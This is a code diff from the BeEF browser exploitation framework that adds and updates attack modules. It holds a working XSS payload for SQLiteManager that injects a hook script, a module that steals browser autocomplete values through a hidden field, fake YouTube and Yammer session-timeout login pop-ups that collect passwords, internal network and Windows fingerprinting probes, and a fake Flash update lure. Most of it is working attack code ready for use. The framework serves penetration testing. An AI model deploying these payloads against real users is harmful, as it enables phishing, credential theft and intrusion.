# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
sqlitemanager_xss:
enable: true
category: ["Exploits", "XSS"]
name: "SQLiteManager XSS"
description: "Attempts to hook SQLiteManager using XSS.<br/>Tested on version 1.2.4 however other versions are likely to be vulnerable."
authors: ["bcoles"]
target:
unknown: ["ALL"]

23
modules/exploits/sqlitemanager_xss/module.rb Normal file
View File

@@ -0,0 +1,23 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Sqlitemanager_xss < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
return [
{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"><script src="'+hook_uri+'"></script><p+"'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

46
modules/host/detect_vm/command.js
View File

@@ -12,25 +12,29 @@ beef.execute(function() {
var result;
var dimensions = {
'320, 200' : '',
'320, 240' : '',
'640, 480' : '',
'800, 480' : '',
'768, 576' : '',
'854, 480' : '',
'1024, 600' : '',
'1152, 768' : '',
'800, 600' : '',
'1024, 768' : '',
'1280, 854' : '',
'1280, 960' : '',
'320, 200' : '',
'320, 240' : '',
'320, 480' : '', // iPhone 4S and earlier
'480, 320' : '', // iPhone 4S and earlier
'640, 480' : '',
'640, 1136' : '', // iPhone 5
'800, 480' : '',
'768, 576' : '',
'854, 480' : '',
'1024, 600' : '',
'1136, 640' : '', // iPhone 5
'1152, 768' : '',
'800, 600' : '',
'1024, 768' : '',
'1280, 854' : '',
'1280, 960' : '',
'1280, 1024' : '',
'1280, 720' : '',
'1280, 768' : '',
'1366, 768' : '',
'1280, 800' : '',
'1440, 900' : '',
'1440, 960' : '',
'1280, 720' : '',
'1280, 768' : '',
'1366, 768' : '',
'1280, 800' : '',
'1440, 900' : '',
'1440, 960' : '',
'1400, 1050' : '',
'1600, 1200' : '',
'2048, 1536' : '',
@@ -46,11 +50,15 @@ beef.execute(function() {
if (dimensions[wh] != undefined) {
result = "Not virtualized";
} else if (beef.hardware.isVirtualMachine()) {
result = "Virtualized";
} else if (beef.hardware.isMobilePhone()) {
result = "Not virtualized";
} else {
result = "This host is virtualized or uses an unrecognized screen resolution";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result+"&w="+screen.width+"&h="+screen.height);
});

44
modules/host/os_fingerprinting/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var os_version = new Array;
var dom = document.createElement('b');
Array.prototype.unique = function() {
var o = {}, i, l = this.length, r = [];
for(i=0; i<l;i+=1) o[this[i]] = this[i];
for(i in o) r.push(o[i]);
return r;
};
parse_os_details = function() {
if (!os_version.length) os_version[0] = "unknown";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "windows_nt_version="+os_version.unique());
};
// OS fingerprints // in the form of: "URI","NT version(s)"
var fingerprints = new Array(
new Array("5.1+","res://IpsmSnap.dll/wlcm.bmp"),
new Array("5.1+","res://wmploc.dll/257/album_0.png"),
new Array("5.1-6.0","res://wmploc.dll/23/images\amg-logo.gif"),
new Array("5.1-6.1","res://wmploc.dll/wmcomlogo.jpg"),
new Array("6.0+","res://wdc.dll/error.gif")
);
for (var i=0; i<fingerprints.length; i++) {
var img = new Image;
img.name = fingerprints[i][0];
img.src = fingerprints[i][1];
img.onload = function() { os_version.push(this.name); dom.removeChild(this); }
dom.appendChild(img);
}
setTimeout('parse_os_details();', 2000);
});

16
modules/host/os_fingerprinting/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
os_fingerprinting:
enable: true
category: "Host"
name: "Fingerprint Operating System"
description: "This module attempts to fingerprint the Windows Operating System version using the 'res' protocol handler for Internet Explorer. It loads images from DLLs specific to different versions of Windows. This method does not rely on JavaScript objects which may have been modified by the user or browser compatibility mode."
authors: ["bcoles"]
target:
working: IE
not_working: ALL

20
modules/host/os_fingerprinting/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Uses methods described here:
# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
class Os_fingerprinting < BeEF::Core::Command
def post_execute
content = {}
content['windows_nt_version'] = @datastore['windows_nt_version'] if not @datastore['windows_nt_version'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint Windows version.'
end
save content
end
end

239
modules/network/internal_network_fingerprinting/command.js
View File

@@ -9,7 +9,7 @@ beef.execute(function() {
var dom = document.createElement('b');
var ips = new Array();
ipRange = "<%= @ipRange %>";
ports = "<%= @ports %>";
ports = "<%= @ports %>";
if(ports != null){
ports = ports.split(',');
}
@@ -17,7 +17,7 @@ beef.execute(function() {
if(ipRange != null){
// ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
// (only C class IPs are supported atm)
ipBounds = ipRange.split('-');
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
@@ -47,72 +47,189 @@ beef.execute(function() {
];
}
/* URLs in the form of:
"Dev/App Name", -- string
"Default Port", -- string
"Protocol", -- string -- http/https
"Use Multiple Ports if specified", -- boolean
"IMG path", -- string -- file path
"IMG width", -- integer
"IMG height" -- integer
*/
var urls = new Array(
// in the form of: "Dev/App Name","Default Port","Use Multiple Ports if specified","IMG url","IMG width","IMG height"
new Array("Apache",":80",false,"/icons/apache_pb.gif",259,32),
new Array("Apache 2.x",":80",false,"/icons/apache_pb2.gif",259,32),
new Array("Microsoft IIS 7.x",":80",false,"/welcome.png",571,411),
new Array("Microsoft IIS",":80",false,"/pagerror.gif",36,48),
new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16),
new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21),
new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28),
new Array("Billion Router",":80",false,"/customized/logo.gif",318,69),
new Array("Billion Router",":80",false,"/customized/logo.gif",224,55),
new Array("SMC Networks",":80",false,"/images/logo.gif",133,59),
new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52),
new Array("Linksys NAS",":80",false,"/logo.jpg",194,52),
new Array("Linksys Network Camera",":80",false,"/welcome.jpg",146,250),
new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97),
new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66),
new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62),
new Array("Dell Laser Printer",":80",false,"/ews/images/delllogo.gif",100,100),
new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52),
new Array("HP LaserJet Printer",":80",false,"/hp/device/images/logo.gif",42,27),
new Array("HP LaserJet Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105),
new Array("Siemens Simatic",":80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
new Array("APC InfraStruXure Manager",":80",false,"/images/Xlogo_Layer-1.gif",342,327),
new Array("Barracuda Spam/Virus Firewall",":8000",true,"/images/powered_by.gif",211,26),
new Array("TwonkyMedia Server",":9000",false,"/images/TwonkyMediaServer_logo.jpg",150,82),
new Array("Alt-N MDaemon World Client",":3000",false,"/LookOut/biglogo.gif",342,98),
new Array("VLC Media Player",":8080",false,"/images/white_cross_small.png",9,9),
new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100),
new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31),
new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59),
new Array("Xerox Printer",":80",false,"/printbut.gif",30,30),
new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26),
new Array("Epson Printer",":80",false,"/cyandot.gif",1,1),
new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60),
new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30),
new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16),
new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149),
new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32),
new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16),
new Array("Glassfish Server",":4848",false,"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200)
new Array(
"Apache",
"80","http",false,
"/icons/apache_pb.gif",259,32),
new Array(
"Apache 2.x",
"80","http",false,
"/icons/apache_pb2.gif",259,32),
new Array(
"Microsoft IIS 7.x",
"80","http",false,
"/welcome.png",571,411),
new Array(
"Microsoft IIS",
"80","http",false,
"/pagerror.gif",36,48),
new Array(
"QNAP NAS",
"8080","http",false,
"/ajax_obj/img/running.gif",16,16),
new Array(
"QNAP NAS",
"8080","http",false,
"/ajax_obj/images/qnap_logo_w.gif",115,21),
new Array(
"Belkin Router",
"80","http",false,
"/images/title_2.gif",321,28),
new Array(
"Billion Router",
"80","http",false,
"/customized/logo.gif",318,69),
new Array(
"Billion Router",
"80","http",false,
"/customized/logo.gif",224,55),
// new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59),
new Array(
"Linksys NAS",
"80","http",false,
"/Admin_top.JPG",750,52),
new Array(
"Linksys NAS",
"80","http",false,
"/logo.jpg",194,52),
new Array(
"Linksys Network Camera",
"80","http",false,
"/welcome.jpg",146,250),
new Array(
"Linksys Wireless-G Camera",
"80","http",false,
"/header.gif",750,97),
new Array(
"Cisco IP Phone",
"80","http",false,
"/Images/Logo",120,66),
new Array(
"Snom Phone",
"80","http",false,
"/img/snom_logo.png",168,62),
new Array(
"Dell Laser Printer",
"80","http",false,
"/ews/images/delllogo.gif",100,100),
new Array(
"Brother Printer",
"80","http",false,
"/pbio/brother.gif",144,52),
new Array(
"HP LaserJet Printer",
"80","http",false,
"/hp/device/images/logo.gif",42,27),
new Array(
"HP LaserJet Printer",
"80","http",false,
"/hp/device/images/hp_invent_logo.gif",160,52),
new Array(
"JBoss Application server",
"8080","http",true,
"/images/logo.gif",226,105),
// new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
new Array(
"APC InfraStruXure Manager",
"80","http",false,
"/images/Xlogo_Layer-1.gif",342,327),
new Array(
"Barracuda Spam/Virus Firewall",
"8000","http",true,
"/images/powered_by.gif",211,26),
new Array(
"TwonkyMedia Server",
"9000","http",false,
"/images/TwonkyMediaServer_logo.jpg",150,82),
// new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
// new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
new Array(
"VMware ESXi Server",
"80","http",false,
"/background.jpeg",1,1100),
new Array(
"Microsoft Remote Web Workplace",
"80","http",false,
"/Remote/images/submit.gif",31,31),
new Array(
"XAMPP",
"80","http",false,
"/xampp/img/xampp-logo-new.gif",200,59),
new Array(
"Xerox Printer",
"80","http",false,
"/printbut.gif",30,30),
new Array(
"Konica Minolta Printer",
"80","http",false,
"/G27_light.gif",206,26),
new Array(
"Epson Printer",
"80","http",false,
"/cyandot.gif",1,1),
new Array(
"HP Printer",
"80","http",false,
"/hp/device/images/hp_invent_logo.gif",160,52),
// new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
// new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
new Array(
"Zenoss",
"8080","http",false,
"/zport/dmd/favicon.ico",16,16),
new Array(
"BeEF",
"3000","http",false,
"/ui/media/images/beef.png",200,149),
new Array(
"BeEF (PHP)",
"80","http",false,
"/beef/images/beef.gif",32,32),
new Array(
"Wordpress",
"80","http",true,
"/wp-includes/images/wpmini-blue.png",16,16),
new Array(
"Glassfish Server",
"4848","http",false,
"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200),
new Array(
"pfSense",
"443","https",false,
"/themes/pfsense_ng/images/logo.gif",200,56)
);
// for each ip
for(var i=0; i < ips.length; i++) {
// for each url
for(var u=0; u < urls.length; u++) {
if(!urls[u][2] && ports != null){ // use default port
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
img.id = u;
img.src = "http://"+ips[i]+urls[u][1]+urls[u][3];
img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
}else{ // iterate to all the specified ports
for(p=0;p<ports.length;p++){
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
img.id = u;
img.src = "http://"+ips[i]+":"+ports[p]+urls[u][3];
img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
}
}
if(!urls[u][3] && ports != null){ // use default port
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
} else { // iterate to all the specified ports
for(p=0;p<ports.length;p++){
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
}
}
}
}
});

1
modules/persistence/confirm_close_tab/command.js
View File

@@ -22,6 +22,7 @@ beef.execute(function() {
if (e.stopPropagation) {
e.stopPropagation();
e.preventDefault();
e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";
}
}

2
modules/persistence/confirm_close_tab/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Persistence"
name: "Confirm Close Tab"
description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12"
description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12. In Chrome you can't keep opening confirm dialogs."
authors: ["antisnatchor"]
target:
user_notify: ["ALL"]

4
modules/phonegap/phonegap_check_connection/config.yaml
View File

@@ -10,8 +10,8 @@ beef:
phonegap_check_connection:
enable: true
category: "Phonegap"
name: "Check connection"
description: "Find out connection type e.g. Wifi, 3G.."
name: "Check Connection"
description: "Find out the network connection type e.g. Wifi, 3G."
authors: ["mh"]
target:
working: ["All"]

75
modules/social_engineering/autocomplete_theft/command.js Normal file
View File

@@ -0,0 +1,75 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
steal_autocomplete = function() {
var results = [];
// hijack keys and set focus
get_autocomplete = function (){
window.addEventListener("keydown",function(e){
switch(e.keyCode) {
case 37: // left
scrollTo(window.pageXOffset-20, window.pageYOffset);
break;
case 38: // up
scrollTo(window.pageXOffset, window.pageYOffset-20);
break;
case 39: // right
scrollTo(window.pageXOffset+20, window.pageYOffset);
break;
case 40: // down
scrollTo(window.pageXOffset, window.pageYOffset+20);
break;
default:break;
}
},false);
document.getElementById("placeholder").focus();
}
inArray = function(el, arr){
for (var i = 0;i < arr.length;i++)
if (el===arr[i])
return true;
return false;
}
steal = function(n,v) {
var val = JSON.stringify({'input':n,'value':v});
if (v != "" && !inArray(val,results)){
results.push(val);
//console.log(val);
beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
}
}
tt = function(ev) {
if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100);
}
// create hidden input element
input = document.createElement('input');
input.setAttribute("id", "placeholder");
input.setAttribute("name", "<%= @input_name %>");
input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;");
input.setAttribute("type", "text");
input.onkeyup = function(event) { tt(event); }
input.onkeydown = function(event) { tt(event); }
input.onblur = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); }
document.body.appendChild(input);
// steal autocomplete
get_autocomplete();
}
setTimeout("steal_autocomplete();", 100);
});

16
modules/social_engineering/autocomplete_theft/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
steal_autocomplete:
enable: true
category: "Social Engineering"
name: "Steal Autocomplete"
description: "This module steals autocomplete values from Firefox. The user must press the up or down arrow keys twice, followed by the left or right arrow key, in order to steal autocomplete information.<br/>Hint: Try convincing the user to enter the Konami code (Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter)."
authors: ["Stefano Di Paola", "bcoles"]
target:
working: ["FF"]
not_working: ["ALL"]

49
modules/social_engineering/autocomplete_theft/module.rb Normal file
View File

@@ -0,0 +1,49 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# Based on the PoC by Stefano Di Paola
# Ported to BeEF by bcoles
# For more information see: http://blog.mindedsecurity.com/2011/10/autocompleteagain.html
################################################################################
class Steal_autocomplete < BeEF::Core::Command
def self.options
return [
{ 'name' => 'input_name',
'type' => 'combobox',
'ui_label' => 'Input Field Name',
'store_type' => 'arraystore',
'store_fields' => ['element_name'],
'store_data' => [
['login'],
['email'],
['Email'],
['session[username_or_email]'],
['q'],
['search'],
['name'],
['company'],
['city'],
['state'],
['country'],
],
'emptyText' => 'Select an input field name to steal autocomplete values',
'valueField' => 'element_name',
'displayField' => 'element_name',
'mode' => 'local',
'autoWidth' => true
}
]
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end

2
modules/social_engineering/fake_flash_update/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
authors: ["mh", "antisnatchor"]
target:
user_notify: ['ALL']

84
modules/social_engineering/pretty_theft/command.js
View File

@@ -163,6 +163,65 @@ beef.execute(function() {
credgrabber = setInterval(checker,1000);
}
// YouTube floating div
function youtube() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
document.body.appendChild(sneakydiv);
// Set appearance using styles, maybe cleaner way to do this with CSS block?
var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
var windowmain = 'style="border:1px #555 solid;"';
var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"';
var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"';
var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';
var title = 'Session Timed Out <img src="' + logo + '" align=right height=20 width=70 alt="YouTube">';
var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
// Build page including styles
sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Username: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
// Repeatedly check if button has been pressed
credgrabber = setInterval(checker,1000);
}
// Yammer floating div
function yammer() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
document.body.appendChild(sneakydiv);
// Set appearance using styles, maybe cleaner way to do this with CSS block?
var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
var windowmain = 'style="border:1px #555 solid;"';
var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"';
var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"';
var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
var logo = 'https://www.yammer.com/favicon.ico';
var title = 'Session Timed Out <img src="' + logo + '" align=right height=24 width=24 alt="Yammer">';
var messagewords = 'Your Yammer session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
// Build page including styles
sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Username: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
// Repeatedly check if button has been pressed
credgrabber = setInterval(checker,1000);
}
// Generic floating div with image
function generic() {
@@ -181,19 +240,24 @@ beef.execute(function() {
// Set background opacity and apply background
var backcolor = "<%== @backing %>";
if(backcolor == "Grey"){
grayOut(true,{'opacity':'70'});
}else if(backcolor == "Clear"){
grayOut(true,{'opacity':'0'});
grayOut(true,{'opacity':'70'});
} else if(backcolor == "Clear"){
grayOut(true,{'opacity':'0'});
}
// Retrieve the chosen div option from Beef and display
// Retrieve the chosen div option from BeEF and display
var choice = "<%= @choice %>";
if(choice == "Facebook"){
facebook();
} else if(choice == "LinkedIn"){
linkedin();
} else{
generic();
switch (choice) {
case "Facebook":
facebook(); break;
case "LinkedIn":
linkedin(); break;
case "YouTube":
youtube(); break;
case "Yammer":
yammer(); break;
default:
generic(); break;
}
});

2
modules/social_engineering/pretty_theft/module.rb
View File

@@ -9,7 +9,7 @@ class Pretty_theft < BeEF::Core::Command
configuration = BeEF::Core::Configuration.instance
logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
return [
{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
{'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },

75
test/integration/tc_debug_modules.rb
View File

@@ -18,8 +18,13 @@ class TC_DebugModules < Test::Unit::TestCase
@@mod_debug_ascii_chars = nil
@@mod_debug_test_network = nil
# NOTE: Tests within the same test class are called in the order they are defined.
# NOTE: However, test classes are run in alphabetical order by classname.
# That's why we use the prefix x_N_y, with N being the order of execution.
#
